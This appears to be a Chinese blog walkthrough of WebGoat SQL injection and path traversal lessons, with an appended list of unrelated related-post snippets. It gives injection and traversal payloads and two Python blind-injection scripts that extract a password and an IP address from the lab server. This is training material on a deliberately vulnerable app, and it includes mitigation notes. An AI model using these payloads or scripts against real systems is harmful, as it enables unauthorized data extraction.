hee_mee
hee_mee

Webgoat -SQL

SQL注入(简介)

  • 什么是SQL?
select department from employees where first_name='Bob';
  • 数据处理语言(DML)
update employees set department='Sales' where userid = 89762;
  • 数据定义语言(DDL)
ALTER table employees add phone varchar(20);
  • 数据控制语言(DCL)
#Grant  <权限>  on  表名[(列名)]  to  用户 With  grant  option
#或 GRANT <权限> ON <数据对象> FROM <数据库用户>  

GRANT alter TABLE TO UnauthorizedUser;
  • 字符串SQL注入
SELECT * From user_data WHERE Login_Count = '1  or '1' = '1

Webgoat -SQL_第1张图片

  • 数值SQL注入
SELECT * From user_data WHERE Login_Count = 1 and userid= 1 or 1=1

Webgoat -SQL_第2张图片

  • String SQL注入

Webgoat -SQL_第3张图片

  • 字符串SQL注入
' or 1 = 1 --

Webgoat -SQL_第4张图片

  • 数值SQL注入
1 or 1 = 1 --

Webgoat -SQL_第5张图片

SQL注入(高级)

  • 特殊字符
 -- , #     注释
 ; 			允许执行指令链
 ',+,||     允许字符串拼接
  • 联合查询
' ; select * from user_system_data --

Webgoat -SQL_第6张图片

SQL盲注

  • 判断存在盲注
SELECT * from articles where article_id = 4 
SELECT * from articles where article_id = 4 AND 1 = 1

如果返回内容相同,则存在盲注

  • 利用方法
https://my-shop.com?article=4 AND substring(database_version(),1,1) = 2

如果数据库的权限设置正确(意味着无法与用于从Web应用程序连接到数据库的用户查询系统表),则该方法可能不起作用。

  • 基于时间的SQL注入
SELECT * from articles where article_id = 4 ; sleep(10) --

根据响应时间判断是否存在注入

  • 判断存在盲注
#帐户名字符串,为字符串型注入 选用 '1
username_reg=tom&email_reg=tom%40tom.com&password_reg=passaa&confirm_password_reg=tom

username_reg=tom+'+and+1='1&email_reg=tom%40tom.com&password_reg=passaa&confirm_password_reg=tom

Webgoat -SQL_第7张图片

username_reg=tom+'+and+substring(password%2C1%2C1)+%3D+'1&email_reg=tom%40tom.com&password_reg=passaa&confirm_password_reg=tom

在这里插入图片描述
当输入tom时,结果为 already exists
当输入tom 'and 1='1时,结果为already exists
当输入tom 'and 1='2时,结果为 tom ‘and 1=’ created
可见 and之后结果为true则返回already exists为false返回 created
所以tom ’ and substring(password,1,1)='xalready exists时,x为password字段中的一个元素
编写密码爆破代码

#!/usr/bin/python
# -*- coding:utf-8 -*-
import requests
from string import printable

chars = printable

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest'
}
cookies = {
    'JSESSIONID': 'GFk1ly1AkBOXoZPNy4LMvs4H_cEW2WS0lUJK5T3r'
}
url = 'http://192.168.80.2:8080/WebGoat/SqlInjectionAdvanced/challenge'
res = ""
i = 0
print("======start====")
while True:
    i += 1
    tmp = res
    for char in chars:
        data = "username_reg=tom+'+and+substring(password%2C{0}%2C1)%3D'{1}" \
               "&email_reg=passaa%40q&password_reg=passaa&confirm_password_reg=q".format(i, char)
        respond = requests.put(url=url, headers=headers, cookies=cookies, data=data)
        if 'already exists' in respond.text:
            res += char
            break
    print(res)
    if tmp == res:
        break

Webgoat -SQL_第8张图片
最终得到thisisasecretfortomonly&,但是输入之后无法登陆,发现&起连接作用也可以出现already exists,所以舍弃,最终密码为thisisasecretfortomonly

SQL Injection (mitigation)

  • 防御方法
#使用占位符 ?
String query = "SELECT first_name, last_name, acct_id, balance FROM user_data WHERE acct_id = **?**";
#使用静态查询语句
PreparedStatement statement = connection.prepareStatement(query);
statement.setString(1, accountID);
#使用安全带存储过程
#使用白名单验证order by 语句
  • java sql防御Webgoat -SQL_第9张图片
try{
    Connection ct = null; 
    ct=DriverManager.getConnection(DBURL,DBUSER,DBPW);
    PreparedStatement ps=ct.prepareStatement("select * from users where name=?");
    ps.setString(1,"3");
    ResultSet rs=ps.executeQuery();    
} catch(Exception e){
    System.out.println("123");
}
  • 0x09、0x10
'or/**/1=1--

Webgoat -SQL_第10张图片
通过/**/绕过空格限制,但却返回sorry…

  • order by
    点击箭头可以进行排序
    在这里插入图片描述
    使用ip进行排序
    Webgoat -SQL_第11张图片
    报错注入得到表名servers,已经查询语句
select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by testa

Webgoat -SQL_第12张图片

GET /WebGoat/SqlInjectionMitigations/serverscolumn=case+when(TRUE)+then+ip+else+mac+end HTTP/1.1

GET /WebGoat/SqlInjectionMitigations/servers?column=ip HTTP/1.1

两者执行结果相同

case when(true)then a else b end

#when结果为true 则执行
select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by a
#when 为false
select id, hostname, ip, mac, status, description from servers  where status <> 'out of order' order by b

所以可以执行when((select substring(ip,1,1) from servers where hostname=‘webgoat-prd’ )=x)来判断x是否为ip的元素

#!/usr/bin/python
# -*- coding:utf-8 -*-
import requests
from string import digits


chars = digits + '.'

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest'
}
cookies = {
    'JSESSIONID': 'tUAGEO6LuXxhFcQJLVW7p2GYf0VgznaI6oCbqfF3'
}

res = ""
i = 0
print("======start====")
while True:
    i += 1
    for char in chars:
        url = "http://192.168.80.2:8080/WebGoat/SqlInjectionMitigations/servers?" \
              "column=case+when((select+substring(ip%2c{0}%2c1)+from+servers+" \
              "where+hostname%3d'webgoat-prd')%3d'{1}')+then+hostname+else+ip+end".format(i, char)
        respond = requests.get(url=url, headers=headers, cookies=cookies)
        if 'webgoat-acc' == respond.json()[0]['hostname']:
            res += char
            break
    print(res)
    if res[-1] == '.':
        break

获得104. 由于题目给出130.219.202,拼接得到答案104.130.219.202

Path traversal

  • 文件上传漏洞
    使用 …/ 或%2e%2e%2f 绕过
/../../../../../home/webgoat/.webgoat-8.1.0/PathTraversal/test

Webgoat -SQL_第13张图片

  • 双重编码
....//..//..//pass

在这里插入图片描述

  • 第九题
../../../.webgoat-8.1.0/PathTraversal/pass

在这里插入图片描述

  • 第十题
    抓取show random cat picture

Webgoat -SQL_第14张图片

GET /WebGoat/PathTraversal/random-picture?id=%2e%2e%2f%2e%2e%2f

Webgoat -SQL_第15张图片

GET /WebGoat/PathTraversal/random-picture?id=%2e%2e%2f%2e%2e%2fpath-traversal-secret

Webgoat -SQL_第16张图片

#生成sha512字符串
echo -n "passaa"|openssl dgst -sha512 
#或
echo -n "passaa"|shasum -a 512

Webgoat -SQL_第17张图片

你可能感兴趣的:(webgoat)

  • Web 漏洞训练平台学习笔记(webgoat & juice shop) Beethen Tang 前端学习docker安全
    Web漏洞训练平台实验目的了解常见Web漏洞训练平台;了解常见Web漏洞的基本原理;掌握OWASPTop10及常见Web高危漏洞的漏洞检测、漏洞利用和漏洞修复方法;实验环境WebGoat/Juiceshopkali2021.2实验要求每个实验环境完成不少于5种不同漏洞类型的漏洞利用练习(可选)使用不同于官方教程中的漏洞利用方法完成目标漏洞利用练习(可选)最大化漏洞利用效果实验(可选)定位缺陷代码(
  • 小迪安全21WEB 攻防-JavaWeb 项目&JWT 身份攻击&组件安全&访问控制 yiqiqukanhaiba 安全
    #知识点:1、JavaWeb常见安全及代码逻辑2、目录遍历&身份验证&逻辑&JWT3、访问控制&安全组件&越权&三方组件Java:大部分都是第三方插件出现漏洞webgoat的搭建:——java靶场JDK版本要求:11.0以上需先启动webgoat-server:java-jarwebgoat-server-8.1.0.jar--server.port=8080然后访问http://127.0.0.
  • Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译 LaPluie985 安全web安全javapython网络安全
    知识点:1、JavaWeb常见安全及代码逻辑2、目录遍历&身份验证&逻辑&JWT3、访问控制&安全组件&越权&三方组件案例演示:JavaWeb-WebGoat8靶场搭建使用安全问题-目录遍历&身份认证-JWT攻击安全问题-访问控制&安全组件-第三方组件环境下载地址:GitHub-WebGoat/WebGoat:WebGoatisadeliberatelyinsecureapplication(安装
  • JAVA漏洞简单总结 carrot11223 网络安全java开发语言漏洞jwt
    第一部分:Javaweb常见安全及代码漏洞以开源项目webgoat-server-8.1.0为例,可以在GitHub上看到,直接可以下载jar包,在本地准备jdk环境,使用以下命令进行启动:java-jarwebgoat-server-8.1.0.jar--server.port=9091WebGoat版本可能是用Java11或更高版本编译的,因此无法在Java8上运行。再下一个麻烦,直接用ide
  • 38-WEB漏洞-反序列化之PHP&JAVA全解(下) 月亮今天也很亮 小迪安全web安全学习前端phpjava
    WEB漏洞-反序列化之PHP&JAVA全解(下)一、Java中API实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb靶场反序列化测试3.4、2020-网鼎杯-朱雀组-Web-think_java真题复现四、涉及资源一、Java中API实现二、序列化理解序列化(Serialization):将对象的状态信息转换为可以存储或传输
  • WebGoat8.2.2通关记录一(General、Injection) fiskeryang 安全性测试
    安装与部署#安装dockerpullwebgoat/goatandwolf#启动sudodockerrun-d-p6870:8888-p6869:8080-p6871:9090webgoat/goatandwolf我下载webgoat版本经常无法自动启动webwolf,需要进入到容器命令函手动启动dockerexec-it-urootfervent_carsonbashshstart.sh准备工具
  • VM中kali虚拟机创建docker部署WebGoat d0ublεU0x00 docker容器网络安全
    这里选择在docker中配置(因为方便)首先下载dockersudoapt-getinstalldocker.io然后从DockerHub下载WebGoat8.0的docker镜像使用命令dockerpullwebgoat/webgoat-8.0完成后查看现在kali虚拟机中的docker镜像列表输入命令dockerimages这里看见已经有了这个webgoat-8.0的镜像现在创建一个docke
  • WebGoat 指定端口号 爱博客大伯 安全攻防#webgoatwebgoat
    文章目录新版本的WebGoat旧版本WebGoat新版本的WebGoat使用WEBGOAT_PORT指定WebGoat的端口号使用WEBWOLF_PORT指定WebWolf的端口号java-DWEBGOAT_PORT=8081-jarwebgoat-2023.8.jarjava-DWEBGOAT_PORT=8081-DWEBWOLF_PORT=9091-jarwebgoat-2023.8.jarW
  • 2020-02-12Jsp挖掘(6)-JSP命令执行漏洞 thelostworldSec
    JSP命令执行漏洞一、代码执行成因调用Runtime但是没有对传入参数没有过滤和限制:jsp调用命令行的只需要在中编写使用Runtime类即可调用命令行Windows用“&”,linux用“;”号来分隔多条命令'cmd.exe/ctype"E:\jsp\WebGoat-5.3_RC1\tomcat\webapps\webgoat\lesson_plans\English\BasicAuthenti
  • Token 绕过 / JWT漏洞 / 垂直越权 / WebGoat–JWT靶场 tokens–4、5、7 关 gjl_ 网络安全web安全笔记安全
    Cookie、Session和Token都是用于在Web应用程序中进行身份验证和状态管理的工具Cookie存储在客户端缺点:容易被盗取Session存储在服务器缺点:如双十一等大量用户访问时,服务器需要存储查询大量Session,查询速度慢资源开销大,对性能也会产生影响Token存储在客户端,解决了大量Session存储在服务器访问速度慢的问题加密JWT概述jsonwebtokenjson是一种数
  • JWT安全及WebGoat靶场 西柠! 安全网络安全
    JWT安全cookie(放在浏览器)cookie是一个非常具体的东西,指的就是浏览器里面能永久存储的一种数据,仅仅是浏览器实现的一种数据存储功能。cookie由服务器生成,发送给浏览器,浏览器把cookie以kv形式保存到某个目录下的文本文件内,下一次请求同一网站时会把该cookie发送给服务器。由于cookie是存在客户端上的,所以浏览器加入了一些限制确保cookie不会被恶意使用,同时不会占据
  • webgoat-Cross Site Scripting XSS 跨站脚本攻击 测试开发-东方不败之鸭梨 安全测试web安全安全
    01概念本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。目标了解什么是XSS,XSS如何工作?学习反射型XSS及注入,基于DOM的XSS注入02WhatisXSS?Cross-SiteScripting也叫XSS是一种漏洞,允许将未经编码或者过滤的HTML或者script标签作为输入渲染至浏览器。Cross-SiteScripting(XSS)isthemostprevalent
  • sonar对webgoat进行静态扫描 测试开发-东方不败之鸭梨 安全测试java开发语言
    安装sonar并配置docker安装sonarqube,sonarQube静态代码扫描-Joson6350-博客园(cnblogs.com)对webgoat进行sonar扫描扫描结果bugsChangethisconditionsothatitdoesnotalwaysevaluateto"false"意思是这里的elseif语句不会执行,因为ipAddressKnow为true,所以if和els
  • WebGoat通关攻略之 SQL Injection (intro) Mr. G K WebGoatWebGoat
    SQLInjection(intro)1.WhatisSQL?本题练习SQL查询语句,就是写一句SQL获取叫BobFranco所在的departmentSELECTdepartmentFROMemployeesWHEREfirst_name='Bob'ANDlast_name='Franco'成功通关!2.DataManipulationLanguage(DML)本题练习的是Update修改数据,
  • webgoat-Challenges 测试开发-东方不败之鸭梨 安全测试服务器运维
    AdminLostpassword这一题密码藏在logo图片里请求GET/WebGoat/challenge/logo搜索admin看到密码,使用账号admin和这个密码登录拿到flagWithoutpassword题目要求:在不知道Larry的密码情况下登录考虑使用SQL注入密码输入123'or1=1--Adminpasswordreset随便输入admin开头的邮箱,抓包,把host地址改为w
  • webgoat通关汇总文章 测试开发-东方不败之鸭梨 安全测试运维
    BrokenAccessControllwebgoat-BrokenAccessControlI访问控制失效-CSDN博客CryptographicFailures加密解密基础知识CryptoBasics-CSDN博客Injectionwebgoat-(A1)SQLInjection-CSDN博客XSSwebgoat-Pathtraversal目录遍历-CSDN博客SecurityMisconfi
  • linux部署webgoat catch that elf 安全环境安装linuxwebgoat部署靶机
    文章目录程序包准备上传部署程序包准备github上下载程序包,如果太慢可以点击下载webgoat-server-8.2.2.jar上传部署将包上传到服务器上,需要说明该包依赖java环境且对java版本要求较高,我们这里是用java17进行部署,需要提前配置好java17配置java环境java部署过程参见linux部署java执行java-version看到java版本信息标识java环境配置成
  • 在Ubuntu环境下使用docker配置webgoat环境 xian_wwq 部署安全JAVAdockerwebgoatubuntu
    1.安装Docker环境sudoaptinstalldocker.io2.配置Docker加速打开配置文件vim/etc/docker/daemon.json添加mirrors信息{"registry-mirrors":["https://registry.docker-cn.com","http://hub-mirror.c.163.com"]}3.重启dockersystemctldaemon
  • 代码审计(Java)——WebGoat_RequestForgeries wavesky111 代码审计java开发语言
    一、Cross-siteRequestForgeries1.level3这里的level3,就是限制了Referer的参数值为空或者是不等于host即可,单纯为了教学而设计的题目,没啥可说的~因为java功底有限,待我再研究研究token怎么整,这里先按照简单的referer校验源头校验修复,后面再把这个token修复放上(太菜了……)ok这里就简单的修复完成了,规定referer同源有一个致命的
  • webgoat环境搭建 weixin_30588675 开发工具java
    链接:https://pan.baidu.com/s/1gfEKIyB密码:5zdq1:配置Java环境变量,过程请找度娘2:解压下载好的tomcat3:将webgoat-container-7.0.1.war文件copy到tomcat中的webapps目录下4:打开tomcat中bin文件夹下的startup.bat文件,之后webapps下会多出一个名为webgoat-container-7.
  • webgoat7.1开发版环境搭建 weixin_30909575 gitjava
    环境准备:gitmavenjdktomcat然后进入正文:下载webgoat门户cd~/webgoatgitclonehttps://github.com/WebGoat/WebGoat.gitgitclonehttps://github.com/WebGoat/WebGoat-Lessons.gitcdWebGoatgitcheckout7.1mvncleancompileinstallcd..
  • WebGoat靶场漏洞环境搭建Jar版 北岸冷若冰霜 #靶场安全安全漏洞安全linux
    WebGoat靶场漏洞环境搭建Jar版项目地址https://github.com/WebGoat/WebGoat环境描述Linux:Ubuntu16.04.6LTSJava版本:jdk-13.0.2WebGoat:webgoat-server-8.0.0.M26环境WebGoat1.更新源sudo-iapt-getupdate&&apt-getcleanaptinstall-ycurlgit2.
  • 带你快速搭建靶场漏洞环境|WebGoat之Jar版 万天峰 jarubuntulinux
    WebGoatisadeliberatelyinsecurewebapplicationmaintainedbyOWASPdesignedtoteachwebapplicationsecuritylessons.Thisprogramisademonstrationofcommonserver-sideapplicationflaws.Theexercisesareintendedtobeused
  • docker安装webgoat 天下是个小趴菜 webgoatdockerjavalinux
    docker安装webgoat一般来说无需docker,在https://github.com/WebGoat/WebGoat/releases中,下载最新的v8.2.2.jar,然后java-jarwebgoat-server-8.2.2.jar然后反问http://127.0.0.1/WebGoat即可但是,由于本人windows主机(java10.0.2)和kali虚拟机(1.8和11.0)
  • 当我安装第n次 WebGoat 8.2.2终于成功了!!!(Windows) 159的小韭菜 安装合集java开发语言
    安装一直发生错误,一般不行就是java版本不行和webgoat不匹配,可以试试多下几个版本,建议用最新版webgoat(这里是webgoat8.2.2.jar+jdk-18.0.2.1版本)我这个小菜鸡,哎明明很简单的,咳咳....不能让大家发现我太蠢了,开始吧1、首先是在github.com下载了webgoat8.2.2.2.jar文件(大致名字是这样,没细看),然后也按照要求,有下过java1
  • WebGoat环境搭建 Mr. G K WebGoatWebGoat
    首先安装jdk,此步骤省略…验证直接打开cmd,输入以下命令:java-version(可以查看安装的JDK版本。)javac(查看java文件编译成的class文件)WebGoat下载WebGoat的下载地址:Releases·WebGoat/WebGoat·GitHub下载后存放在任意位置,例如:D:\webgoat打开CMD,先进入到安装目录下然后运行webgoat,windows下用命令j
  • 1021.安全资源共享 weixin_30906671 运维rubyweb安全
    Web安全视频Online-Security-Videos–红日Web安全攻防视频Online-Security-Videos–西安鹏程网络安全攻防课程Online-Security-Videos–Vulhub系列视频Online-Security-Videos–米斯特Web安全攻防视频Online-Security-Videos–SSRF漏洞利用与getshell实战渗透测试靶场WebGoat–
  • WebGoat教程学习(六)--日志欺骗(Log Spoofing) weixin_30693683 java
    Thegreyareabelowrepresentswhatisgoingtobeloggedinthewebserver'slogfile.*Yourgoalistomakeitlikeausername"admin"hassucceededintologgingin.*Elevateyourattackbyaddingascripttothelogfile.灰色框框的部分是日志输出部分,日志的
  • webgoat-Security Logging Failures安全日志记录失败 测试开发-东方不败之鸭梨 安全测试网络服务器运维
    概念日志记录对于现代系统非常重要。我们出于各种原因使用它:应用程序监视和调试。审计日志记录:例如,记录用户和系统的特定操作。安全事件监控:例如,向SIEM或SOAR系统提供信息,该系统将根据这些日志中提供的信息触发。本课程目标用户应该对日志记录和日志记录的位置有基本的了解。用户了解日志欺骗和日志信息泄露的风险。用户将能够进行简单的日志欺骗攻击。用户将能够分辨日志记录所涉及的基本风险。预防日志欺骗当
  • 1006.Web安全攻防靶场之WebGoat – 2 weixin_30896511 web安全javajavascriptViewUI
    概述由于上一篇文章Web安全攻防靶场之WebGoat-1过长,这里分开写后面内容使用Cross-SiteScripting(XSS)跨站脚本攻击,跨站脚本分为三类1.ReflectedXSSInjection反射型xss通过一个链接产生的xss叫做反射型xss,所有恶意内容都在url中。2.StoredXSSInjection存储型xss所有的恶意内容都在网页中,是攻击者通过漏洞将恶意内容写在数据
  • java Illegal overloaded getter method with ambiguous type for propert的解决 zwllxs javajdk
    好久不来iteye,今天又来看看,哈哈,今天碰到在编码时,反射中会抛出 Illegal overloaded getter method with ambiguous type for propert这么个东东,从字面意思看,是反射在获取getter时迷惑了,然后回想起java在boolean值在生成getter时,分别有is和getter,也许我们的反射对象中就有is开头的方法迷惑了jdk,
  • IT人应当知道的10个行业小内幕 beijingjava 工作互联网
    10. 虽然IT业的薪酬比其他很多行业要好,但有公司因此视你为其“佣人”。   尽管IT人士的薪水没有互联网泡沫之前要好,但和其他行业人士比较,IT人的薪资还算好点。在接下的几十年中,科技在商业和社会发展中所占分量会一直增加,所以我们完全有理由相信,IT专业人才的需求量也不会减少。   然而,正因为IT人士的薪水普遍较高,所以有些公司认为给了你这么多钱,就把你看成是公司的“佣人”,拥有你的支配
  • java 实现自定义链表 CrazyMizzz java数据结构
    1.链表结构   链表是链式的结构 2.链表的组成    链表是由头节点,中间节点和尾节点组成    节点是由两个部分组成:       1.数据域       2.引用域 3.链表的实现 &nbs
  • web项目发布到服务器后图片过一会儿消失 麦田的设计者 struts2上传图片永久保存
      作为一名学习了android和j2ee的程序员,我们必须要意识到,客服端和服务器端的交互是很有必要的,比如你用eclipse写了一个web工程,并且发布到了服务器(tomcat)上,这时你在webapps目录下看到了你发布的web工程,你可以打开电脑的浏览器输入http://localhost:8080/工程/路径访问里面的资源。但是,有时你会突然的发现之前用struts2上传的图片
  • CodeIgniter框架Cart类 name 不能设置中文的解决方法 IT独行者 CodeIgniterCart框架 
    今天试用了一下CodeIgniter的Cart类时遇到了个小问题,发现当name的值为中文时,就写入不了session。在这里特别提醒一下。 在CI手册里也有说明,如下: $data = array( 'id' => 'sku_123ABC', 'qty' => 1, '
  • linux回收站 _wy_ linux回收站
    今天一不小心在ubuntu下把一个文件移动到了回收站,我并不想删,手误了。我急忙到Nautilus下的回收站中准备恢复它,但是里面居然什么都没有。     后来我发现这是由于我删文件的地方不在HOME所在的分区,而是在另一个独立的Linux分区下,这是我专门用于开发的分区。而我删除的东东在分区根目录下的.Trash-1000/file目录下,相关的删除信息(删除时间和文件所在
  • jquery回到页面顶端 知了ing htmljquerycss
    html代码: <h1 id="anchor">页面标题</h1> <div id="container">页面内容</div> <p><a href="#anchor" class="topLink">回到顶端</a><
  • B树、B-树、B+树、B*树 矮蛋蛋 B树
    原文地址: http://www.cnblogs.com/oldhorse/archive/2009/11/16/1604009.html B树        即二叉搜索树:        1.所有非叶子结点至多拥有两个儿子(Left和Right); &nb
  • 数据库连接池 alafqq 数据库连接池
    http://www.cnblogs.com/xdp-gacl/p/4002804.html @Anthor:孤傲苍狼 数据库连接池 用MySQLv5版本的数据库驱动没有问题,使用MySQLv6和Oracle的数据库驱动时候报如下错误: java.lang.ClassCastException: $Proxy0 cannot be cast to java.sql.Connec
  • java泛型 百合不是茶 java泛型
    泛型 在Java SE 1.5之前,没有泛型的情况的下,通过对类型Object的引用来实现参数的“任意化”,任意化的缺点就是要实行强制转换,这种强制转换可能会带来不安全的隐患   泛型的特点:消除强制转换 确保类型安全 向后兼容   简单泛型的定义:      泛型:就是在类中将其模糊化,在创建对象的时候再具体定义 class fan
  • javascript闭包[两个小测试例子] bijian1013 JavaScriptJavaScript
    一.程序一 <script> var name = "The Window"; var Object_a = {   name : "My Object",   getNameFunc : function(){ var that = this;     return function(){     
  • 探索JUnit4扩展:假设机制(Assumption) bijian1013 javaAssumptionJUnit单元测试
    一.假设机制(Assumption)概述        理想情况下,写测试用例的开发人员可以明确的知道所有导致他们所写的测试用例不通过的地方,但是有的时候,这些导致测试用例不通过的地方并不是很容易的被发现,可能隐藏得很深,从而导致开发人员在写测试用例时很难预测到这些因素,而且往往这些因素并不是开发人员当初设计测试用例时真正目的,
  • 【Gson四】范型POJO的反序列化 bit1129 POJO
    在下面这个例子中,POJO(Data类)是一个范型类,在Tests中,指定范型类为PieceData,POJO初始化完成后,通过 String str = new Gson().toJson(data); 得到范型化的POJO序列化得到的JSON串,然后将这个JSON串反序列化为POJO   import com.google.gson.Gson; import java.
  • 【Spark八十五】Spark Streaming分析结果落地到MySQL bit1129 Stream
    几点总结: 1. DStream.foreachRDD是一个Output Operation,类似于RDD的action,会触发Job的提交。DStream.foreachRDD是数据落地很常用的方法 2. 获取MySQL Connection的操作应该放在foreachRDD的参数(是一个RDD[T]=>Unit的函数类型),这样,当foreachRDD方法在每个Worker上执行时,
  • NGINX + LUA实现复杂的控制 ronin47 nginx lua
    安装lua_nginx_module 模块 lua_nginx_module 可以一步步的安装,也可以直接用淘宝的OpenResty Centos和debian的安装就简单了。。 这里说下freebsd的安装: fetch http://www.lua.org/ftp/lua-5.1.4.tar.gz tar zxvf lua-5.1.4.tar.gz cd lua-5.1.4 ma
  • java-递归判断数组是否升序 bylijinnan java
    public class IsAccendListRecursive { /*递归判断数组是否升序 * if a Integer array is ascending,return true * use recursion */ public static void main(String[] args){ IsAccendListRecursiv
  • Netty源码学习-DefaultChannelPipeline2 bylijinnan javanetty
    Netty3的API http://docs.jboss.org/netty/3.2/api/org/jboss/netty/channel/ChannelPipeline.html 里面提到ChannelPipeline的一个“pitfall”: 如果ChannelPipeline只有一个handler(假设为handlerA)且希望用另一handler(假设为handlerB) 来
  • Java工具之JPS chinrui java
    JPS使用     熟悉Linux的朋友们都知道,Linux下有一个常用的命令叫做ps(Process Status),是用来查看Linux环境下进程信息的。同样的,在Java Virtual Machine里面也提供了类似的工具供广大Java开发人员使用,它就是jps(Java Process Status),它可以用来
  • window.print分页打印 ctrain window
    function init() { var tt = document.getElementById("tt"); var childNodes = tt.childNodes[0].childNodes; var level = 0; for (var i = 0; i < childNodes.length; i++) {
  • 安装hadoop时 执行jps命令Error occurred during initialization of VM daizj jdkhadoopjps
    在安装hadoop时,执行JPS出现下面错误   [slave16][email protected]:/tmp/hsperfdata_hdfs# jps Error occurred during initialization of VM java.lang.Error: Properties init: Could not determine current working
  • PHP开发大型项目的一点经验 dcj3sjt126com PHP重构
    一、变量 最好是把所有的变量存储在一个数组中,这样在程序的开发中可以带来很多的方便,特别是当程序很大的时候。变量的命名就当适合自己的习惯,不管是用拼音还是英语,至少应当有一定的意义,以便适合记忆。变量的命名尽量规范化,不要与PHP中的关键字相冲突。 二、函数 PHP自带了很多函数,这给我们程序的编写带来了很多的方便。当然,在大型程序中我们往往自己要定义许多个函数,几十
  • android笔记之--向网络发送GET/POST请求参数 dcj3sjt126com android
    使用GET方法发送请求 private static boolean sendGETRequest (String path, Map<String, String> params) throws Exception{ //发送地http://192.168.100.91:8080/videoServi
  • linux复习笔记 之bash shell (3) 通配符 eksliang linux 通配符linux通配符
    转载请出自出处: http://eksliang.iteye.com/blog/2104387 在bash的操作环境中有一个非常有用的功能,那就是通配符。 下面列出一些常用的通配符,如下表所示 符号 意义 * 万用字符,代表0个到无穷个任意字符 ? 万用字符,代表一定有一个任意字符 [] 代表一定有一个在中括号内的字符。例如:[abcd]代表一定有一个字符,可能是a、b、c
  • Android关于短信加密 gqdy365 android
    关于Android短信加密功能,我初步了解的如下(只在Android应用层试验):     1、因为Android有短信收发接口,可以调用接口完成短信收发;         发送过程:APP(基于短信应用修改)接受用户输入号码、内容——>APP对短信内容加密——>调用短信发送方法Sm
  • asp.net在网站根目录下创建文件夹 hvt .netC#hovertreeasp.netWeb Forms
    假设要在asp.net网站的根目录下建立文件夹hovertree,C#代码如下: string m_keleyiFolderName = Server.MapPath("/hovertree"); if (Directory.Exists(m_keleyiFolderName)) { //文件夹已经存在 return; } else { try { D
  • 一个合格的程序员应该读过哪些书 justjavac 程序员书籍
    编者按:2008年8月4日,StackOverflow 网友 Bert F 发帖提问:哪本最具影响力的书,是每个程序员都应该读的? “如果能时光倒流,回到过去,作为一个开发人员,你可以告诉自己在职业生涯初期应该读一本, 你会选择哪本书呢?我希望这个书单列表内容丰富,可以涵盖很多东西。” 很多程序员响应,他们在推荐时也写下自己的评语。 以前就有国内网友介绍这个程序员书单,不过都是推荐数
  • 单实例实践 跑龙套_az 单例
       1、内部类 public class Singleton { private static class SingletonHolder { public static Singleton singleton = new Singleton(); } public Singleton getRes
  • PO VO BEAN 理解 q137681467 VODTOpo
    PO:      全称是 persistant object持久对象 最形象的理解就是一个PO就是数据库中的一条记录。 好处是可以把一条记录作为一个对象处理,可以方便的转为其它对象。     BO:     全称是 business object:业务对象 主要作用是把业务逻辑封装为一个对象。这个对
  • 战胜惰性,暗自努力 金笛子 努力
    偶然看到一句很贴近生活的话:“别人都在你看不到的地方暗自努力,在你看得到的地方,他们也和你一样显得吊儿郎当,和你一样会抱怨,而只有你自己相信这些都是真的,最后也只有你一人继续不思进取。”很多句子总在不经意中就会戳中一部分人的软肋,我想我们每个人的周围总是有那么些表现得“吊儿郎当”的存在,是否你就真的相信他们如此不思进取,而开始放松了对自己的要求随波逐流呢? 我有个朋友是搞技术的,平时嘻嘻哈哈,以
  • NDK/JNI二维数组多维数组传递 wenzongliang 二维数组jniNDK
    多维数组和对象数组一样处理,例如二维数组里的每个元素还是一个数组 用jArray表示,直到数组变为一维的,且里面元素为基本类型,去获得一维数组指针。给大家提供个例子。已经测试通过。 Java_cn_wzl_FiveChessView_checkWin( JNIEnv* env,jobject thiz,jobjectArray qizidata) { jint i,j; int s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他